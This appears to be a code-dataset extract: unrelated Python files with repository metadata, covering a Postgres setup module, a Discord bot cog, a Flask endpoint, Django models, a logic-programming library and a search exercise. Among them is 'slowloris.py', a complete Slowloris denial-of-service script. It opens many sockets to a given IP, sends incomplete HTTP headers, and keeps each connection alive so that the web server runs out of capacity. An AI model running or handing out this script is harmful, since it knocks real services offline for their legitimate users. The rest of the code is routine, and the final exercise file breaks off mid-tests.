Base = declarative_base()
from .harvester import (
HarvesterRow,
MonitoredPathRow,
)
| 27.908 | 84 | 0.570446 | import psycopg2
from psycopg2 import sql
import string
import os
from .row import Row
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
Base = declarative_base()
from .harvester import (
HarvesterRow,
MonitoredPathRow,
)
def create_harvester_user(config, harvester, password, test=False):
conn = _create_superuser_connection(config)
if test:
role = 'test_harvester'
else:
role = 'harvester'
# create harvester user
_create_user(conn, harvester, password, role)
conn.close()
def create_machine_id(config, machine_id, harvester_name):
conn = _create_superuser_connection(config)
# if machine_id does not already exist then create it
harvester = HarvesterRow.select_from_machine_id(machine_id, conn)
if harvester is None:
HarvesterRow(machine_id, harvester_name).insert(conn)
conn.commit()
conn.close()
def add_machine_path(config, machine_id, path, users):
conn = _create_superuser_connection(config)
harvester = HarvesterRow.select_from_machine_id(machine_id, conn)
if harvester is None:
raise RuntimeError(
'machine_id "{}" does not exist'.format(machine_id)
)
MonitoredPathRow(
harvester.id,
users,
path
).insert(conn)
conn.commit()
conn.close()
def edit_machine_path(config, machine_id):
conn = _create_superuser_connection(config)
harvester = HarvesterRow.select_from_machine_id(machine_id, conn)
if harvester is None:
raise RuntimeError(
'machine_id "{}" does not exist'.format(machine_id)
)
paths = MonitoredPathRow.select_from_harvester_id(harvester.id, conn)
print('Monitored paths for machine "{}" are:'.format(machine_id))
for i, path in enumerate(paths):
print(' {}. {}'.format(i, path.path.replace('/usr/data/', '')))
while True:
index = input('Type the path number you wish to edit: ')
try:
index = int(index)
break
except ValueError:
print(
'Error: {} could not be converted to an integer'.format(index)
)
monitored_for = paths[index].monitored_for
paths[index].delete(conn)
conn.commit()
while True:
path = input(
'Type the new path (an empty path removes this monitored path): '
)
if os.path.isabs(path):
print(
'Please enter a relative path '
'to GALVANALYSER_HARVESTER_BASE_PATH'
)
elif path == '':
return
else:
path = '/usr/data/' + path
break
MonitoredPathRow(
harvester.id,
monitored_for,
path
).insert(conn)
conn.commit()
conn.close()
def create_database(config, test=False):
print('Creating database....')
_create(config)
print('Applying initial migrations....')
_setup(config, test)
print('Finished creating database.')
def _create_user(conn, username, password, role='normal_user'):
with conn.cursor() as cur:
# drop user if they exist
user_ident = sql.Identifier(username)
cur.execute(
sql.SQL("DROP USER IF EXISTS {user}").format(user=user_ident)
)
# create user
user_type = sql.Identifier(role)
cur.execute(sql.SQL(
"""
CREATE USER {user} WITH
LOGIN
NOSUPERUSER
INHERIT
NOCREATEDB
NOCREATEROLE
NOREPLICATION
PASSWORD %(passwd)s;
GRANT {type} TO {user};
"""
).format(user=user_ident, type=user_type),
{'passwd': password})
conn.commit()
def _database_exists(cur, name):
cur.execute("SELECT datname FROM pg_database;")
return (name,) in cur.fetchall()
def _create_superuser_connection(config):
return psycopg2.connect(
host=config["GALVANISER_DATABASE"]["HOST"],
port=config["GALVANISER_DATABASE"]["PORT"],
database=config["GALVANISER_DATABASE"]["NAME"],
user=config["GALVANISER_DATABASE"]["USER"],
password=config["GALVANISER_DATABASE"]["PASSWORD"],
)
def _create(config):
conn = psycopg2.connect(
host=config["GALVANISER_DATABASE"]["HOST"],
port=config["GALVANISER_DATABASE"]["PORT"],
database="postgres",
user=config["GALVANISER_DATABASE"]["USER"],
password=config["GALVANISER_DATABASE"]["PASSWORD"],
)
conn.autocommit = True
db_name = config["GALVANISER_DATABASE"]["NAME"]
with conn.cursor() as cur:
if _database_exists(cur, db_name):
print(
'in create():"{}" database already exists, dropping'.format(db_name)
)
cur.execute(
sql.SQL(
"DROP DATABASE {db_name};"
).format(db_name=sql.Identifier(db_name)))
cur.execute(sql.SQL("""
CREATE DATABASE {db_name}
WITH
OWNER = postgres
ENCODING = 'UTF8'
LC_COLLATE = 'en_US.utf8'
LC_CTYPE = 'en_US.utf8'
TABLESPACE = pg_default
CONNECTION LIMIT = -1;
""").format(db_name=sql.Identifier(db_name)))
conn.close()
def _setup(config, test=False):
conn = _create_superuser_connection(config)
if test:
harvester_role = 'test_harvester'
else:
harvester_role = 'harvester'
print('using roles', harvester_role)
with conn.cursor() as cur:
# create roles if they dont exist
cur.execute("SELECT rolname FROM pg_roles;")
roles = cur.fetchall()
for role in [harvester_role]:
if (role,) not in roles:
cur.execute(sql.SQL("""
CREATE ROLE {role} WITH
NOLOGIN
NOSUPERUSER
INHERIT
NOCREATEDB
NOCREATEROLE
NOREPLICATION;
""").format(role=sql.Identifier(role)))
conn.commit()
# set timezone
cur.execute(
sql.SQL(
"ALTER DATABASE {db_name} SET timezone TO 'UTC';"
).format(
db_name=sql.Identifier(
config["GALVANISER_DATABASE"]["NAME"]
)
)
)
cur.execute("SELECT pg_reload_conf();")
# create initial database
filename = os.path.join(
os.path.dirname(__file__),
"setup.pgsql"
)
cur.execute(
string.Template(
open(filename, "r").read()
).substitute(
harvester_role=harvester_role,
)
)
conn.commit()
conn.close()
| 6,464 | 0 | 230 |
49b8740c785069cbca81ccdfb08e1ce33f77fee8 | 1,113 | py | Python | aztk/client/client.py | Geims83/aztk | 8f8e7b268bdbf82c3ae4ecdcd907077bd6fe69b6 | [
"MIT"
] | 161 | 2017-10-04T08:58:27.000Z | 2022-01-03T13:01:04.000Z | aztk/client/client.py | Geims83/aztk | 8f8e7b268bdbf82c3ae4ecdcd907077bd6fe69b6 | [
"MIT"
] | 400 | 2017-09-29T21:52:08.000Z | 2021-01-08T02:48:56.000Z | aztk/client/client.py | isabella232/aztk | 6e04372d19661ead6744387edab7beda16e3d928 | [
"MIT"
] | 74 | 2017-10-13T04:41:26.000Z | 2021-12-20T15:56:42.000Z | from aztk import models
from aztk.utils import azure_api
class CoreClient:
"""The base AZTK client that all other clients inherit from.
**This client should not be used directly. Only software specific clients
should be used.**
"""
| 33.727273 | 80 | 0.703504 | from aztk import models
from aztk.utils import azure_api
class CoreClient:
"""The base AZTK client that all other clients inherit from.
**This client should not be used directly. Only software specific clients
should be used.**
"""
def __init__(self):
self.secrets_configuration = None
self.batch_client = None
self.blob_client = None
self.table_service = None
def _get_context(self, secrets_configuration: models.SecretsConfiguration):
self.secrets_configuration = secrets_configuration
azure_api.validate_secrets(secrets_configuration)
self.batch_client = azure_api.make_batch_client(secrets_configuration)
self.blob_client = azure_api.make_blob_client(secrets_configuration)
self.table_service = azure_api.make_table_service(secrets_configuration)
context = {
"batch_client": self.batch_client,
"blob_client": self.blob_client,
"table_service": self.table_service,
"secrets_configuration": self.secrets_configuration,
}
return context
| 807 | 0 | 54 |
446d3c502edcc9e6f84b8f10397077cf54871c59 | 3,022 | py | Python | cogs/events/voice.py | disneyresidents/2rezi-bot | c7fbc46a0b6852d5795f3350baeac89fc1e5d519 | [
"MIT"
] | 9 | 2020-08-02T03:50:01.000Z | 2022-01-06T05:25:47.000Z | cogs/events/voice.py | disneyresidents/bot-cog | c7fbc46a0b6852d5795f3350baeac89fc1e5d519 | [
"MIT"
] | null | null | null | cogs/events/voice.py | disneyresidents/bot-cog | c7fbc46a0b6852d5795f3350baeac89fc1e5d519 | [
"MIT"
] | 3 | 2020-08-10T05:08:50.000Z | 2020-12-05T10:00:29.000Z | import asyncio
import re
import discord
from discord.ext import commands
| 38.253165 | 90 | 0.609199 | import asyncio
import re
import discord
from discord.ext import commands
class Voice(commands.Cog, name="voice"):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_voice_state_update(self, member, before, after):
if member.guild.id == 662503350633365515:
if member.bot:
return
ch_dic = {
669850293407842305: 669850327599546389,
669850376341815347: 669850400039370762
}
if before.channel is None:
if after.channel.id not in ch_dic.keys():
return
ch = self.bot.get_channel(ch_dic[after.channel.id])
await ch.send(f"{member}が{after.channel}に参加しました")
if after.channel is None:
if before.channel.id not in ch_dic.keys():
return
ch = self.bot.get_channel(ch_dic[before.channel.id])
await ch.send(f"{member}が{before.channel}から離脱しました")
@commands.has_permissions(manage_guild=True)
@commands.group(invoke_without_command=True, hidden=True)
async def voice(self, ctx):
await ctx.send(f"{ctx.prefix}voice [set_log, rem_log]")
@commands.has_permissions(manage_guild=True)
@voice.command(hidden=True)
async def set_log(self, ctx, ch_id: int = None):
if ctx.author.voice.channel is None or ch_id is None:
def check(m):
return m.author == ctx.author and m.channel == ctx.channel
await ctx.send("監視するボイスチャンネルのidまたは名前を送信してください")
try:
msg = await self.bot.wait_for("message", check=check, timeout=300)
except asyncio.TimeoutError:
return await ctx.send("タイムアウトしました。最初からやり直してください")
p = re.compile(r"[0-9]+")
if p.fullmatch(msg.content):
ch = self.bot.get_channel(int(msg.content))
else:
ch = discord.utils.get(ctx.guild.voice_channels, name=msg.content)
if ch is None:
return await ctx.send("チャンネルを見つけられませんでした、名前、idが間違っていないか確かめてください")
if not isinstance(ch, discord.VoiceChannel):
return await ctx.send("指定されたチャンネルはボイスチャンネルではありません。名前、idが間違っていないか確かめてください")
await self.bot.voice_log.put(ch.id, ctx.channel.id)
await ctx.send(f"{ctx.channel}を{ch}のログチャンネルとして設定しました")
elif ctx.author.voice.channel:
await self.bot.voice_log.put(ctx.author.voice.channel.id, ctx.channel.id)
await ctx.send(f"{ctx.channel}を{ctx.author.voice.channel}のログチャンネルとして設定しました")
elif ch_id:
ch = self.bot.get_channel(ch_id)
if ch is None:
return await ctx.send("チャンネルを見つけられませんでした、名前、idが間違っていないか確かめてください")
if not isinstance(ch, discord.VoiceChannel):
return await ctx.send("指定されたチャンネルはボイスチャンネルではありません。名前、idが間違っていないか確かめてください")
def setup(bot):
bot.add_cog(Voice(bot))
| 3,101 | 347 | 46 |
6ac42f1ec378a9bba90c87d80cc37c6563ac1bc5 | 1,136 | py | Python | app/api/lists.py | palazzem/gello | 19fe9e4aa8de485dd829a87047ec64f89b5fa7ee | [
"Apache-2.0"
] | 44 | 2018-03-28T14:22:23.000Z | 2022-03-15T07:25:06.000Z | app/api/lists.py | palazzem/gello | 19fe9e4aa8de485dd829a87047ec64f89b5fa7ee | [
"Apache-2.0"
] | 44 | 2018-03-28T14:19:03.000Z | 2022-02-16T10:24:57.000Z | app/api/lists.py | palazzem/gello | 19fe9e4aa8de485dd829a87047ec64f89b5fa7ee | [
"Apache-2.0"
] | 12 | 2018-03-28T14:15:43.000Z | 2021-07-19T17:33:20.000Z | # -*- coding: utf-8 -*-
#
# Unless explicitly stated otherwise all files in this repository are licensed
# under the Apache 2 License.
#
# This product includes software developed at Datadog
# (https://www.datadoghq.com/).
#
# Copyright 2018 Datadog, Inc.
#
"""api/lists.py
Exposed lists for autocomplete.
"""
from flask import jsonify, request, url_for
from flask_login import login_required
from ..models import List
from . import api
@api.route('/lists/<string:board_id>')
@login_required
| 23.183673 | 78 | 0.65493 | # -*- coding: utf-8 -*-
#
# Unless explicitly stated otherwise all files in this repository are licensed
# under the Apache 2 License.
#
# This product includes software developed at Datadog
# (https://www.datadoghq.com/).
#
# Copyright 2018 Datadog, Inc.
#
"""api/lists.py
Exposed lists for autocomplete.
"""
from flask import jsonify, request, url_for
from flask_login import login_required
from ..models import List
from . import api
@api.route('/lists/<string:board_id>')
@login_required
def get_lists(board_id):
list = request.args.get('list', 1, type=int)
pagination = List.query.filter_by(board_id=board_id).paginate(
list, per_page=100, error_out=False)
lists = pagination.items
prev = None
if pagination.has_prev:
prev = url_for('api.get_lists', list=list-1, _external=True)
next = None
if pagination.has_next:
next = url_for('api.get_lists', list=list+1, _external=True)
return jsonify(
{
'lists': [list.to_json() for list in lists],
'prev': prev,
'next': next,
'count': pagination.total
}
)
| 616 | 0 | 22 |
9d6ed3a4d70d04463333dc2bacd3f64ffaa9050e | 1,181 | py | Python | src/lib/telegram/utils/helpers.py | thonkify/thonkify | 2cb4493d796746cb46c8519a100ef3ef128a761a | [
"MIT"
] | 17 | 2017-08-04T15:41:05.000Z | 2020-10-16T18:02:41.000Z | src/lib/telegram/utils/helpers.py | thonkify/thonkify | 2cb4493d796746cb46c8519a100ef3ef128a761a | [
"MIT"
] | 3 | 2017-08-04T23:37:37.000Z | 2017-08-04T23:38:34.000Z | src/lib/telegram/utils/helpers.py | thonkify/thonkify | 2cb4493d796746cb46c8519a100ef3ef128a761a | [
"MIT"
] | 3 | 2017-12-07T16:30:59.000Z | 2019-06-16T02:48:28.000Z | #!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
""" This module contains helper functions """
import re
try:
from html import escape as escape_html # noqa: F401
except ImportError:
from cgi import escape as escape_html # noqa: F401
def escape_markdown(text):
"""Helper function to escape telegram markup symbols"""
escape_chars = '\*_`\['
return re.sub(r'([%s])' % escape_chars, r'\\\1', text)
| 35.787879 | 71 | 0.733277 | #!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
""" This module contains helper functions """
import re
try:
from html import escape as escape_html # noqa: F401
except ImportError:
from cgi import escape as escape_html # noqa: F401
def escape_markdown(text):
"""Helper function to escape telegram markup symbols"""
escape_chars = '\*_`\['
return re.sub(r'([%s])' % escape_chars, r'\\\1', text)
| 0 | 0 | 0 |
45e1e2fa3701f2bf89181cfdbefd64dc0d1f878a | 4,347 | py | Python | neuralogic/core/constructs/atom.py | LukasZahradnik/PyNeurologic | 99025a92e86f772b139369acf75d08a3b506994d | [
"MIT"
] | null | null | null | neuralogic/core/constructs/atom.py | LukasZahradnik/PyNeurologic | 99025a92e86f772b139369acf75d08a3b506994d | [
"MIT"
] | null | null | null | neuralogic/core/constructs/atom.py | LukasZahradnik/PyNeurologic | 99025a92e86f772b139369acf75d08a3b506994d | [
"MIT"
] | null | null | null | from typing import Iterable, Union
from neuralogic.core.constructs.predicate import Predicate
from neuralogic.core.constructs import rule, factories
AtomType = Union["BaseAtom", "WeightedAtom"]
BodyAtomType = Union["BaseAtom", "WeightedAtom"]
Head = AtomType
Body = Union[Iterable[BodyAtomType], BodyAtomType]
| 31.273381 | 100 | 0.6294 | from typing import Iterable, Union
from neuralogic.core.constructs.predicate import Predicate
from neuralogic.core.constructs import rule, factories
AtomType = Union["BaseAtom", "WeightedAtom"]
BodyAtomType = Union["BaseAtom", "WeightedAtom"]
Head = AtomType
Body = Union[Iterable[BodyAtomType], BodyAtomType]
class BaseAtom:
def __init__(self, predicate: Predicate, terms=None, negated=False):
self.predicate = predicate
self.negated = negated
self.terms = terms
if self.terms is None:
self.terms = []
elif not isinstance(self.terms, Iterable):
self.terms = [self.terms]
def __neg__(self) -> "BaseAtom":
return self.__invert__()
def __invert__(self) -> "BaseAtom":
return BaseAtom(self.predicate, self.terms, not self.negated)
def __truediv__(self, other):
if not isinstance(other, int) or self.predicate.arity != 0 or other < 0:
raise NotImplementedError
name, private, special = self.predicate.name, self.predicate.private, self.predicate.special
return factories.AtomFactory.Predicate.get_predicate(name, other, private, special)
def __call__(self, *args) -> "BaseAtom":
if self.terms:
raise Exception
terms = list(args)
arity = len(terms)
name, private, special = self.predicate.name, self.predicate.private, self.predicate.special
predicate = factories.AtomFactory.Predicate.get_predicate(name, arity, private, special)
return BaseAtom(predicate, terms, self.negated)
def __getitem__(self, item) -> "WeightedAtom":
return WeightedAtom(self, item)
def __le__(self, other: Body) -> rule.Rule:
return rule.Rule(self, other)
def to_str(self, end=False) -> str:
negation = "~" if self.negated else ""
end = "." if end else ""
if self.terms:
terms = ", ".join(str(term) for term in self.terms)
return f"{negation}{self.predicate.to_str()}({terms}){end}"
return f"{negation}{self.predicate.to_str()}{end}"
def __str__(self) -> str:
return self.to_str(True)
def __copy__(self):
atom = BaseAtom.__new__(BaseAtom)
atom.negated = self.negated
atom.terms = self.terms
atom.predicate = self.predicate
class WeightedAtom: # todo gusta: mozna dedeni namisto kompozice?
def __init__(self, atom: BaseAtom, weight, fixed=False):
self.atom = atom
self.weight = weight
self.weight_name = None
self.is_fixed = fixed
if isinstance(weight, slice):
self.weight_name = str(weight.start)
self.weight = weight.stop
elif isinstance(weight, tuple) and isinstance(weight[0], slice):
self.weight_name = str(weight[0].start)
self.weight = (weight[0].stop, *weight[1:])
if isinstance(weight, Iterable) and not isinstance(weight, tuple):
self.weight = list(weight)
def fixed(self) -> "WeightedAtom":
if self.is_fixed:
raise Exception
# set_field(get_field(self.java_object, "weight"), "isFixed", True)
return WeightedAtom(self.atom, self.weight, True)
@property
def negated(self):
return self.atom.negated
@property
def predicate(self):
return self.atom.predicate
@property
def terms(self): # todo gusta: ...tim bys usetril toto volani atp.
return self.atom.terms
def __invert__(self) -> "WeightedAtom":
return WeightedAtom(~self.atom, self.weight, self.is_fixed)
def __neg__(self) -> "WeightedAtom":
return self.__invert__()
def __le__(self, other: Body) -> rule.Rule:
return rule.Rule(self, other)
def to_str(self, end=False):
if isinstance(self.weight, tuple):
weight = f"{{{', '.join(str(w) for w in self.weight)}}}"
else:
weight = str(self.weight)
if self.is_fixed:
return f"<{weight}> {self.atom.to_str(end)}"
return f"{weight} {self.atom.to_str(end)}"
def __str__(self):
return self.to_str(True)
def __copy__(self):
atom = WeightedAtom.__new__(WeightedAtom)
atom.atom = self.atom
atom.weight = self.weight
atom.is_fixed = self.is_fixed
| 3,339 | 377 | 315 |
49582d1081d0a7a36fa4b6ef69c3cd116e5a9b96 | 351 | py | Python | docs/_exts/setup.py | mihaimitrut/Sylius | 94f16e3adee4183f649ecc9d69faa1b6eb22116e | [
"MIT"
] | 86 | 2018-04-02T13:43:35.000Z | 2021-11-15T12:27:41.000Z | docs/_exts/setup.py | mihaimitrut/Sylius | 94f16e3adee4183f649ecc9d69faa1b6eb22116e | [
"MIT"
] | 82 | 2020-03-08T14:28:59.000Z | 2022-02-26T23:19:18.000Z | docs/_exts/setup.py | mihaimitrut/Sylius | 94f16e3adee4183f649ecc9d69faa1b6eb22116e | [
"MIT"
] | 29 | 2015-01-10T17:55:36.000Z | 2021-05-06T12:45:10.000Z | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name = 'sphinx-php',
version = '1.0',
author = 'Fabien Potencier',
author_email = 'fabien@symfony.com',
description = 'Sphinx Extensions for PHP and Symfony',
license = 'MIT',
packages = find_packages(),
install_requires = ['Sphinx>=0.6'],
)
| 23.4 | 58 | 0.632479 | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name = 'sphinx-php',
version = '1.0',
author = 'Fabien Potencier',
author_email = 'fabien@symfony.com',
description = 'Sphinx Extensions for PHP and Symfony',
license = 'MIT',
packages = find_packages(),
install_requires = ['Sphinx>=0.6'],
)
| 0 | 0 | 0 |
b49c63fd876909dbb64700ce718b1e23cbeb9695 | 2,587 | py | Python | SlowLoris DDos/slowloris.py | Marzooq13579/Hack-Gadgets | 4b9351c4465f3e01fb0390b1e86dfe7c26237a19 | [
"MIT"
] | 8 | 2019-02-17T20:11:46.000Z | 2019-10-18T06:27:16.000Z | SlowLoris DDos/slowloris.py | Marzooq13579/Hack-Gadgets | 4b9351c4465f3e01fb0390b1e86dfe7c26237a19 | [
"MIT"
] | null | null | null | SlowLoris DDos/slowloris.py | Marzooq13579/Hack-Gadgets | 4b9351c4465f3e01fb0390b1e86dfe7c26237a19 | [
"MIT"
] | 4 | 2019-02-17T23:00:18.000Z | 2019-10-18T06:27:14.000Z | import argparse
import logging
import random
import socket
import ssl
import sys
import time
lista_de_sockets = []
configuracao_agente = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
]
if __name__ == "__main__":
if len(sys.argv)> 1:
slowloris()
else:
print "Insira pelo menos 1 argumento no formato python slowlorys.py ipAddress numberOfSockets"
| 35.930556 | 127 | 0.625048 | import argparse
import logging
import random
import socket
import ssl
import sys
import time
lista_de_sockets = []
configuracao_agente = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
]
def iniciando_socket(ip,porta):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
sock.connect((ip,porta))
sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8")) #envia requisicao http GET
sock.send("User-Agent: {}\r\n".format(configuracao_agente[0]).encode("utf-8")) #Informacao cabecalho tipo de navegador
sock.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) #fim do dado sem carriage return
return sock
def slowloris():
ip = sys.argv[1]
porta = 80
if len(sys.argv) == 3:
numero_de_sockets = int(sys.argv[2])
else:
numero_de_sockets = 33
print("Atacando " + ip+" com "+ str(numero_de_sockets) + " sockets.")
print("Criando os sockets...")
#cria conexao de cada socket
for i in range(numero_de_sockets):
try:
print("Criando socket de numero " + str(i))
sock = iniciando_socket(ip,porta)
except socket.error:
break
lista_de_sockets.append(sock)
#mantendo conexoes
while True:
print("Enviando dado em todos os sockets para manter a conexao aberta...")
print("Numero de sockets ativos: " + str(len(lista_de_sockets)))
#para cada socket da lista envia um novo dado
for sock in list(lista_de_sockets):
try:
#envia dado para conexao aberta
sock.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
except socket.error:
#retira sockets com conexao fechada
lista_de_sockets.remove(sock)
#verifica se algum socket foi retirado da lista de ativos
for i in range(numero_de_sockets - len(lista_de_sockets)):
print("Recriando socket de conexao perdida...")
try:
#cria um novo socket para substituir o socket cancelado
sock = iniciando_socket(ip,porta)
if sock:
lista_de_sockets.append(sock)
except socket.error:
break
time.sleep(15)
if __name__ == "__main__":
if len(sys.argv)> 1:
slowloris()
else:
print "Insira pelo menos 1 argumento no formato python slowlorys.py ipAddress numberOfSockets"
| 2,085 | 0 | 46 |
c3e165f84d82479663c332427c256f869f66e35c | 2,276 | py | Python | fileserver/membership/models.py | zsmith3/Photo-Manager-Server | 2b531159deadd1291d4a8e029a3cf375fb77156f | [
"MIT"
] | null | null | null | fileserver/membership/models.py | zsmith3/Photo-Manager-Server | 2b531159deadd1291d4a8e029a3cf375fb77156f | [
"MIT"
] | 10 | 2019-01-18T17:36:30.000Z | 2022-03-11T23:39:04.000Z | fileserver/membership/models.py | zsmith3/Photo-Manager-Server | 2b531159deadd1291d4a8e029a3cf375fb77156f | [
"MIT"
] | null | null | null | import secrets
from django.db import models
from django.contrib.auth.models import User, Group
# Authentication user group
models.signals.post_save.connect(create_auth_group, sender=Group)
# User configuration settings
models.signals.post_save.connect(create_user_config, sender=User)
| 31.178082 | 151 | 0.647627 | import secrets
from django.db import models
from django.contrib.auth.models import User, Group
# Authentication user group
class AuthGroup(models.Model):
group = models.OneToOneField(Group, related_name="auth", on_delete=models.CASCADE)
token = models.TextField(max_length=64, default=secrets.token_hex)
def __str__(self):
return str(self.group.name)
@staticmethod
def user_is_auth(user):
if AuthGroup.user_is_admin(user):
return True
auth = AuthGroup.objects.filter(id=1).first()
return auth.group in user.groups.all()
@staticmethod
def user_is_admin(user):
admin = AuthGroup.objects.filter(id=2).first()
return admin.group in user.groups.all()
def create_auth_group(sender, instance, created, **kwargs):
if created:
AuthGroup.objects.create(group=instance)
models.signals.post_save.connect(create_auth_group, sender=Group)
# User configuration settings
class UserConfig(models.Model):
user = models.OneToOneField(User, related_name="config", on_delete=models.CASCADE)
SETTINGS = {
"thumb_scale": {
"min": 0,
"max": 1,
"default": {
"desktop": 0.4,
"mobile": 0.2
}
},
"page_size": {
"options": [(x, str(x)) for x in [10, 25, 50, 100, 200, 500, 1000]],
"default": {
"desktop": "100",
"mobile": "25"
}
}
}
desktop_thumb_scale = models.FloatField(default=SETTINGS["thumb_scale"]["default"]["desktop"])
mobile_thumb_scale = models.FloatField(default=SETTINGS["thumb_scale"]["default"]["mobile"])
desktop_page_size = models.PositiveSmallIntegerField(choices=SETTINGS["page_size"]["options"], default=SETTINGS["page_size"]["default"]["desktop"])
mobile_page_size = models.PositiveSmallIntegerField(choices=SETTINGS["page_size"]["options"], default=SETTINGS["page_size"]["default"]["mobile"])
def __str__(self):
return "Config for %s" % str(self.user)
def create_user_config(sender, instance, created, **kwargs):
if created:
UserConfig.objects.create(user=instance)
models.signals.post_save.connect(create_user_config, sender=User)
| 561 | 1,330 | 90 |
7d72b0f383f1e25fcaa936c3a2b83568c37e53fe | 261 | py | Python | src/DNAAnimProp.py | Toonerz/libdna | 9729a4cee7a43f869353b6ecc84ec02f071a6f30 | [
"MIT"
] | 1 | 2021-02-23T12:05:39.000Z | 2021-02-23T12:05:39.000Z | src/DNAAnimProp.py | Toonerz/libdna | 9729a4cee7a43f869353b6ecc84ec02f071a6f30 | [
"MIT"
] | null | null | null | src/DNAAnimProp.py | Toonerz/libdna | 9729a4cee7a43f869353b6ecc84ec02f071a6f30 | [
"MIT"
] | null | null | null | from pandac.PandaModules import *
from panda3d.core import *
from DNAProp import DNAProp | 18.642857 | 33 | 0.735632 | from pandac.PandaModules import *
from panda3d.core import *
from DNAProp import DNAProp
class DNAAnimProp(DNAProp):
def __init__(self):
DNAProp.__init__(self)
anim = ''
def setAnim(self, anim):
self.anim = anim
def getAnim(self):
return self.anim | 73 | 6 | 94 |
2428b80a981e2bd8c1b6521bbf88ed16a990c957 | 2,828 | py | Python | problem_2/problem_2.py | informramiz/problems-vs-algorithms | efa853e7d1c87a6f566faa19e7a46d5ba170b98a | [
"MIT"
] | null | null | null | problem_2/problem_2.py | informramiz/problems-vs-algorithms | efa853e7d1c87a6f566faa19e7a46d5ba170b98a | [
"MIT"
] | null | null | null | problem_2/problem_2.py | informramiz/problems-vs-algorithms | efa853e7d1c87a6f566faa19e7a46d5ba170b98a | [
"MIT"
] | null | null | null | """
Author: Ramiz Raja
Created on: 11/01/2020
Problem: Search in a Rotated Sorted Array
You are given a sorted array which is rotated at some random pivot point.
Example: [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]
You are given a target value to search. If found in the array return its index, otherwise return -1.
You can assume there are no duplicates in the array and your algorithm's runtime complexity must be in the order of O(log n).
Example:
Input: nums = [4,5,6,7,0,1,2], target = 0, Output: 4
"""
def rotated_array_search(input_list, number):
"""
Find the index by searching in a rotated sorted array
Args:
input_list(array), number(int): Input array to search and the target
Returns:
int: Index or -1
"""
# As array is sorted (even if it is rotated), with a little tweak to the binary search logic we can use
# binary search and achieve the desired solution in ln(n)
n = len(input_list)
start = 0
end = n - 1
while start <= end:
m = (start + end) // 2
if input_list[m] == number:
return m
elif input_list[start] > input_list[end]: # check if array part [start, end] is rotated or not
# if input_list[start] > input_list[end] then that means the array part we are checking still contains
# rotated numbers
if number <= input_list[end]:
# if number <= input_list[end] then that means number is in range [m+1, end]
start = m + 1
else:
# if number > input_list[end] then that means number is in range [start, m-1]
end = m - 1
# below are the cases executed only when current array range [start, end] is not rotated
elif number > input_list[m]:
# number is in range [m+1, end]
start = m + 1
else:
# number < mid number so number is in range [start, m-1]
end = m - 1
return -1
tests()
| 31.076923 | 125 | 0.608204 | """
Author: Ramiz Raja
Created on: 11/01/2020
Problem: Search in a Rotated Sorted Array
You are given a sorted array which is rotated at some random pivot point.
Example: [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]
You are given a target value to search. If found in the array return its index, otherwise return -1.
You can assume there are no duplicates in the array and your algorithm's runtime complexity must be in the order of O(log n).
Example:
Input: nums = [4,5,6,7,0,1,2], target = 0, Output: 4
"""
def rotated_array_search(input_list, number):
"""
Find the index by searching in a rotated sorted array
Args:
input_list(array), number(int): Input array to search and the target
Returns:
int: Index or -1
"""
# As array is sorted (even if it is rotated), with a little tweak to the binary search logic we can use
# binary search and achieve the desired solution in ln(n)
n = len(input_list)
start = 0
end = n - 1
while start <= end:
m = (start + end) // 2
if input_list[m] == number:
return m
elif input_list[start] > input_list[end]: # check if array part [start, end] is rotated or not
# if input_list[start] > input_list[end] then that means the array part we are checking still contains
# rotated numbers
if number <= input_list[end]:
# if number <= input_list[end] then that means number is in range [m+1, end]
start = m + 1
else:
# if number > input_list[end] then that means number is in range [start, m-1]
end = m - 1
# below are the cases executed only when current array range [start, end] is not rotated
elif number > input_list[m]:
# number is in range [m+1, end]
start = m + 1
else:
# number < mid number so number is in range [start, m-1]
end = m - 1
return -1
def linear_search(input_list, number):
for index, element in enumerate(input_list):
if element == number:
return index
return -1
def assert_(expected, actual):
assert expected == actual, f"expected={expected}, actual={actual}"
print("Pass")
def test_function(test_case):
input_list = test_case[0]
number = test_case[1]
assert_(expected=linear_search(input_list, number), actual=rotated_array_search(input_list, number))
def tests():
test_function(([6, 7, 8, 9, 10, 1, 2, 3, 4], 6))
test_function(([6, 7, 8, 9, 10, 1, 2, 3, 4], 1))
test_function(([6, 7, 8, 1, 2, 3, 4], 8))
test_function(([6, 7, 8, 1, 2, 3, 4], 1))
test_function(([6, 7, 8, 1, 2, 3, 4], 10))
# edge cases
